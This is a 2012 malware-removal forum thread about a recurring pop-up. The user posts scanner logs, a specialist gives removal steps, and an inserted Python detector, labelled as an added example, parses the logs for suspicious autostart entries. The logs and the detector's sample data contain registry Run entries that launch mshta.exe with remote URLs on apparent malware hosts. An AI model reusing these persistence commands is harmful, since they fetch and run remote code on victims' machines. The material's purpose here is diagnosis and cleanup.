
mshta.exe japenese porn popup

Discussion in 'Virus & Other Malware Removal' started by gagraptor, May 23, 2012.

  1. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    I am constantly getting a pop-up from a Japanese porn site, and the process it uses is MSHTA.exe. If I kill the process it pops up again after 15 or so mins. I have included my HijackThis log below. Also, I ran Process Explorer on mshta and the command line under Image is

    C:\Windows\system32\mshta.exe http://ragmat.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP


    Logfile of Trend Micro HijackThis v2.0.4
    Scan saved at 4:14:56 PM, on 5/23/2012
    Platform: Windows Vista SP2 (WinNT 6.00.1906)
    MSIE: Internet Explorer v8.00 (8.00.6001.19222)
    Boot mode: Normal

    Running processes:
    C:\Windows\system32\Dwm.exe
    C:\Windows\system32\taskeng.exe
    C:\Windows\Explorer.EXE
    C:\Windows\RtHDVCpl.exe
    C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    C:\Program Files\TeamViewer\Version6\TeamViewer.exe
    C:\Program Files\Real\RealPlayer\Update\realsched.exe
    C:\Program Files\Common Files\Java\Java Update\jusched.exe
    C:\Program Files\Windows Sidebar\sidebar.exe
    C:\Program Files\DAEMON Tools Lite\daemon.exe
    C:\Windows\system32\mshta.exe
    C:\Users\GAGAN\Downloads\HijackThis.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe

    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.toshibadirect.com/dpdstart
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.imesh.com/
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.yahoo.com/
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://us.rd.yahoo.com/customize/ie/defaults/su/msgr8/*http://www.yahoo.com
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://us.rd.yahoo.com/customize/ie/defaults/sp/msgr8/*http://www.yahoo.com
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.sweetim.com
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
    R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
    R3 - URLSearchHook: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
    O1 - Hosts: ::1 localhost
    O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
    O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
    O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
    O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll
    O2 - BHO: Increase performance and video formats for your HTML5 <video> - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll
    O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Oracle\JavaFX 2.0 Runtime\bin\jp2ssv.dll
    O2 - BHO: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
    O3 - Toolbar: Veoh Browser Plug-in - {D0943516-5076-4020-A3B5-AEFAF26AB263} - C:\Program Files\Veoh Networks\Veoh\Plugins\reg\VeohToolbar.dll
    O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
    O3 - Toolbar: Veoh Web Player Video Finder - {0FBB9689-D3D7-4f7a-A2E2-585B10099BFC} - C:\Program Files\Veoh Networks\VeohWebPlayer\VeohIEToolbar.dll
    O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O3 - Toolbar: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
    O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
    O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
    O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
    O4 - HKLM\..\Run: [Skytel] Skytel.exe
    O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
    O4 - HKLM\..\Run: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
    O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
    O4 - HKLM\..\Run: [TkBellExe] "c:\program files\real\realplayer\Update\realsched.exe" -osboot
    O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
    O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
    O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
    O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
    O4 - HKLM\..\Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
    O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
    O4 - HKCU\..\Run: [Google Update] "C:\Users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe" /c
    O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files\DAEMON Tools Lite\daemon.exe"
    O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
    O4 - HKCU\..\Run: [SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1
    O4 - HKCU\..\Run: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
    O4 - HKCU\..\RunOnce: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
    O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
    O4 - HKUS\S-1-5-18\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe (User 'SYSTEM')
    O4 - HKUS\.DEFAULT\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe (User 'Default user')
    O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O18 - Protocol: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
    O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\Windows\system32\browseui.dll
    O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
    O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - Agere Systems - C:\Windows\system32\agrsmsvc.exe
    O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    O23 - Service: Ati External Event Utility - ATI Technologies Inc. - C:\Windows\system32\Ati2evxx.exe
    O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
    O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
    O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
    O23 - Service: McAfee SiteAdvisor Service - McAfee, Inc. - c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
    O23 - Service: TeamViewer 6 (TeamViewer6) - TeamViewer GmbH - C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
    O23 - Service: TOSHIBA Navi Support Service (TNaviSrv) - TOSHIBA Corporation - C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
    O23 - Service: TOSHIBA Optical Disc Drive Service (TODDSrv) - TOSHIBA Corporation - C:\Windows\system32\TODDSrv.exe
    O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe

    --
    End of file - 9444 bytes

    Please help, this is driving me nuts. Not keen on reformatting.
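    The pattern in the log above (a HKCU Run/RunOnce value that starts the legitimate mshta.exe with a remote URL) is something a defender can hunt for mechanically. The following is an added example, not code from the thread or from any of the tools named in it: it parses HijackThis "O4" autostart lines and flags any Windows script host (mshta.exe, plus a few similar binaries, a generalisation of the mshta case) that is handed an http(s) URL. The sample lines are copied from the log above; the long-random-token check on the value name is a heuristic of my own.

```python
"""Flag autostart entries that use a Windows script host to run remote content.

The symptom in this thread is a HKCU Run/RunOnce value that launches the
legitimate system binary mshta.exe with a remote URL. The binary itself is not
the problem (see the advice not to delete mshta.exe); the registry value that
feeds it a URL is what needs removing.
"""
from __future__ import annotations

import re
from urllib.parse import urlparse

# HijackThis "O4" autostart line, e.g.
#   O4 - HKCU\..\Run: [Name] mshta.exe http://host/path
#   O4 - HKUS\S-1-5-19\..\Run: [Sidebar] ... (User 'LOCAL SERVICE')
O4_RE = re.compile(
    r"^O4 - (?P<hive>HK[A-Z]+(?:\\S-[\d-]+|\\\.DEFAULT)?)\\\.\.\\(?P<key>Run\w*): "
    r"\[(?P<name>[^\]]*)\] (?P<cmd>.*?)(?: \(User '(?P<user>[^']*)'\))?$"
)
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Signed Microsoft binaries that execute whatever script/HTML they are pointed at.
# mshta.exe is the one in this thread; the others are included as a generalisation.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}


def split_command(cmd: str) -> tuple[str, str]:
    """Return (executable basename, lowercased; remaining arguments)."""
    cmd = cmd.strip()
    if cmd.startswith('"'):  # quoted path, possibly containing spaces
        end = cmd.find('"', 1)
        exe, args = (cmd[1:end], cmd[end + 1:]) if end > 0 else (cmd[1:], "")
    else:
        exe, _, args = cmd.partition(" ")
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower(), args.strip()


def parse_o4(line: str) -> dict | None:
    """Parse one O4 line into its hive, key, value name, executable and args."""
    m = O4_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["exe"], entry["args"] = split_command(entry["cmd"])
    return entry


def find_remote_script_persistence(log_text: str) -> list[dict]:
    """Return every O4 entry whose executable is a script host given a URL."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_o4(line)
        if entry is None or entry["exe"] not in SCRIPT_HOSTS:
            continue
        url = URL_RE.search(entry["args"])
        if url is None:
            continue  # script hosts running local files are common and usually benign
        reasons = [f"{entry['exe']} launched with a remote URL"]
        # Heuristic (assumption, not from the page): a long random-looking token in
        # the value name, like the cccid suffix seen in this thread.
        if re.search(r"[A-Za-z0-9]{20,}", entry["name"]):
            reasons.append("value name contains a long random-looking token")
        findings.append({
            "hive": entry["hive"],
            "key": entry["key"],
            "name": entry["name"],
            "exe": entry["exe"],
            "host": urlparse(url.group(0)).hostname,
            "reasons": reasons,
        })
    return findings


# Constructed sample: O4 lines copied from the HijackThis log in this thread,
# with benign entries included for contrast.
SAMPLE_HJT_LOG = r"""
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1
O4 - HKCU\..\RunOnce: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
"""

if __name__ == "__main__":
    for f in find_remote_script_persistence(SAMPLE_HJT_LOG):
        print(f"{f['hive']}\\..\\{f['key']} [{f['name']}] -> {f['exe']} {f['host']}: "
              + "; ".join(f["reasons"]))
```

The same check can be run against a live machine by exporting the Run and RunOnce keys and feeding the values through `split_command` and `URL_RE`; the remediation is deleting the flagged value, which is exactly what the Malwarebytes log later in the thread shows.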
     
  2. Mark1956

    Mark1956 Malware Specialist

    Joined:
    May 7, 2011
    Messages:
    14,142
    Hi Gagraptor and welcome to TSG, my name is Mark and I will be helping you.

    At the top of the Malware forum there is a notice Everyone MUST read this BEFORE posting for help in this forum.

    As you have not followed that instruction this may be why you have not received a reply. Please go Here, follow ALL the instructions and post the logs that are requested.

    DO NOT make any attempt to delete mshta.exe as it is a legitimate system file.

    I would also like you to do the following and post the logs, as follows:
    Put the logs into separate posts if it makes it easier.

    STEP 1
    Run HijackThis, and press "Scan." When the scan is complete place a check mark next to the following entries (if they are still present): (Please be careful and do not check any other boxes)
    NOTE For Windows 7 and Vista you must turn off the User Account Control to allow HJT to run correctly.
    For Vista, click on Start and type User Accounts in the search box and hit Enter, click on Turn User Account Control on or off, uncheck the box to turn off UAC. For Windows 7 click on Start and type UAC in the box and hit Enter, then move the slider all the way to the bottom and click on ok. This action is not required for Windows XP.

    O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
    O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)

    After checking these items CLOSE ALL open windows except HijackThis and click "Fix Checked" to remove the entries you checked. A box will pop up asking you if you wish to fix the selected items. Please choose YES. Once it has fixed them, close HijackThis.
    If you receive an error message that indicates HJT cannot remove the entries, please try disabling your security software. How to disable your security software
    If after disabling your security software there is still a problem, this could be due to the Malware on your system.
    Please confirm if the fix runs without a problem. If there is a problem tell me what has happened and post the details of any error messages.
    Follow this by opening HJT, go to the Main Menu and Click on "Do a system scan and save logfile." When the log pops up in Notepad, copy and paste that file back here in your next reply.


    STEP 2

    Please download Malwarebytes Anti-Malware and save it to your desktop.
    • Important!! When you save the mbam-setup file, rename it to something random (such as 123abc.exe) before beginning the download.
    • Double-click on the renamed file to install, then follow these instructions for doing a Quick Scan in normal mode.
    • Don't forget to check for database definition updates through the program's interface (preferable method) before scanning.
    • If you cannot update Malwarebytes or use the Internet to download any files to the infected computer, manually update the database by following the instructions in FAQ Section A: 4. Issues.
    Malwarebytes may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (i.e. Spybot's TeaTimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.
    • Double click on the Malwarebytes icon on your desktop to launch the program
    • Under the Scanner tab, make sure the Perform Quick Scan option is selected.
    • Click on the Scan button.
    • When finished, a message box will say "The scan completed successfully. Click Show Results to display all objects found".
    • Click OK to close the message box, then click the Show Results button to see a list of any malware that was found.
    • Make sure that everything is checked and then click Remove Selected.
    • When removal is completed, a log report will open in Notepad.
    • The log is automatically saved and can be viewed by clicking the Logs tab.
    • Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows the database version and your operating system.
    • Exit Malwarebytes when done.
    If Malwarebytes encounters a file that is difficult to remove, you will be asked to reboot your computer so it can proceed with the disinfection process. If asked to restart the computer, please do so immediately. Failure to reboot normally will prevent Malwarebytes from removing all the malware.

    Note: A 14-day trial of Malwarebytes Anti-Malware PRO is available as an option when first installing the free version so all users can test the real-time protection component for a period of two weeks. When the limited time period expires those features will be deactivated and locked. Enabling the Protection Module feature again requires registration and purchase of a license key that includes free lifetime upgrades and support. If you continue to use the free version, there is no requirement to buy a license...you can just use it as a stand-alone scanner.
    NOTE: Some types of malware will target Malwarebytes and other security tools to keep them from running properly. If that's the case, use Malwarebytes Chameleon and follow the onscreen instructions. The Chameleon folder can be accessed by opening the program folder for Malwarebytes Anti-Malware (normally C:\Program Files\Malwarebytes' Anti-Malware or C:\Program Files (x86)\Malwarebytes' Anti-Malware).
     
  3. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    I am sorry, I forgot to add the other logs. I have followed your instructions. I already had Malwarebytes; when I run it I get 3 trojans and I'm asked to restart. After restarting, when I run Malwarebytes again I get the same 3 viruses. I am not able to run GMER as my system freezes.
    I'm including all the other logs. PS: I also have a virtual drive emulation s/w but can't find it to uninstall.
     
  4. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    Malwarebytes Anti-Malware 1.61.0.1400
    www.malwarebytes.org

    Database version: v2012.05.28.01

    Windows Vista Service Pack 2 x86 NTFS
    Internet Explorer 8.0.6001.19222
    GAGAN :: GAGAN-PC [administrator]

    5/28/2012 1:28:46 AM
    mbam-log-2012-05-28 (01-28-46).txt

    Scan type: Quick scan
    Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
    Scan options disabled: P2P
    Objects scanned: 204053
    Time elapsed: 11 minute(s), 4 second(s)

    Memory Processes Detected: 0
    (No malicious items detected)

    Memory Modules Detected: 0
    (No malicious items detected)

    Registry Keys Detected: 0
    (No malicious items detected)

    Registry Values Detected: 3
    HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1 -> Quarantined and deleted successfully.
    HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP -> Quarantined and deleted successfully.
    HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce|RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP -> Quarantined and deleted successfully.

    Registry Data Items Detected: 0
    (No malicious items detected)

    Folders Detected: 0
    (No malicious items detected)

    Files Detected: 0
    (No malicious items detected)

    (end)
     
  5. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    .
    DDS (Ver_2011-08-26.01) - NTFSx86
    Internet Explorer: 8.0.6001.19222 BrowserJavaVersion: 10.3.1
    Run by GAGAN at 3:16:57 on 2012-05-28
    Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.1043 [GMT -4:00]
    .
    AV: Microsoft Security Essentials *Enabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
    SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    SP: Microsoft Security Essentials *Enabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
    .
    ============== Running Processes ===============
    .
    C:\Windows\system32\wininit.exe
    C:\Windows\system32\lsm.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch
    C:\Windows\system32\svchost.exe -k rpcss
    c:\Program Files\Microsoft Security Client\MsMpEng.exe
    C:\Windows\system32\Ati2evxx.exe
    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
    C:\Windows\system32\svchost.exe -k netsvcs
    C:\Windows\system32\svchost.exe -k GPSvcGroup
    C:\Windows\system32\SLsvc.exe
    C:\Windows\system32\svchost.exe -k LocalService
    C:\Windows\system32\Ati2evxx.exe
    C:\Windows\system32\svchost.exe -k NetworkService
    C:\Windows\System32\spoolsv.exe
    C:\Windows\system32\taskeng.exe
    C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
    C:\Windows\system32\Dwm.exe
    C:\Windows\system32\taskeng.exe
    C:\Windows\Explorer.EXE
    C:\Windows\system32\agrsmsvc.exe
    C:\Windows\system32\svchost.exe -k apphost
    C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
    C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
    C:\Windows\system32\rundll32.exe
    C:\Windows\System32\tcpsvcs.exe
    C:\Windows\system32\svchost.exe -k imgsvc
    C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
    C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
    C:\Windows\system32\TODDSrv.exe
    C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
    C:\Windows\system32\svchost.exe -k iissvcs
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
    C:\Windows\system32\SearchIndexer.exe
    C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
    C:\Windows\System32\alg.exe
    C:\Windows\RtHDVCpl.exe
    C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    C:\Program Files\Real\RealPlayer\Update\realsched.exe
    C:\Program Files\DivX\DivX Update\DivXUpdate.exe
    C:\Program Files\Common Files\Java\Java Update\jusched.exe
    C:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\Microsoft Security Client\msseces.exe
    C:\Program Files\Windows Sidebar\sidebar.exe
    C:\Program Files\DAEMON Tools Lite\daemon.exe
    C:\Program Files\Synaptics\SynTP\SynToshiba.exe
    C:\Program Files\iPod\bin\iPodService.exe
    C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
    C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
    C:\Windows\system32\taskeng.exe
    C:\Windows\system32\mshta.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Windows\system32\rundll32.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    c:\PROGRA~1\mcafee\SITEAD~1\saui.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\SearchProtocolHost.exe
    C:\Windows\system32\SearchFilterHost.exe
    C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe
    .
    ============== Pseudo HJT Report ===============
    .
    uStart Page = hxxp://search.imesh.com/
    uDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
    mStart Page = hxxp://home.sweetim.com
    mDefault_Page_URL = hxxp://www.yahoo.com/
    mDefault_Search_URL = hxxp://us.rd.yahoo.com/customize/ie/defaults/su/msgr8/*http://www.yahoo.com
    mSearch Page = hxxp://us.rd.yahoo.com/customize/ie/defaults/sp/msgr8/*http://www.yahoo.com
    mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
    uInternet Settings,ProxyOverride = *.local
    mSearchAssistant =
    uURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
    mURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
    mURLSearchHooks: H - No File
    BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelper.dll
    BHO: Skype add-on (mastermind): {22bf413b-c6d2-4d91-82a9-a0f997ba588c} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
    BHO: RealPlayer Download and Record Plugin for Internet Explorer: {3049c3e9-b461-4bc5-8870-4c09146192ca} - c:\programdata\real\realplayer\browserrecordplugin\ie\rpbrowserrecordplugin.dll
    BHO: DivX Plus Web Player HTML5 <video>: {326e768d-4182-46fd-9c16-1449a49795f4} - c:\program files\divx\divx plus web player\ie\divxhtml5\DivXHTML5.dll
    BHO: Windows Live ID Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
    BHO: McAfee SiteAdvisor BHO: {b164e929-a1b6-4a06-b104-2cd0e90a88ff} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
    BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\oracle\javafx 2.0 runtime\bin\jp2ssv.dll
    BHO: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
    TB: Veoh Browser Plug-in: {d0943516-5076-4020-a3b5-aefaf26ab263} - c:\program files\veoh networks\veoh\plugins\reg\VeohToolbar.dll
    TB: Veoh Web Player Video Finder: {0fbb9689-d3d7-4f7a-a2e2-585b10099bfc} - c:\program files\veoh networks\veohwebplayer\VeohIEToolbar.dll
    TB: McAfee SiteAdvisor Toolbar: {0ebbbe48-bad4-4b4c-8e5a-516abecae064} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
    TB: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
    TB: {EEE6C35B-6118-11DC-9C72-001320C79847} - No File
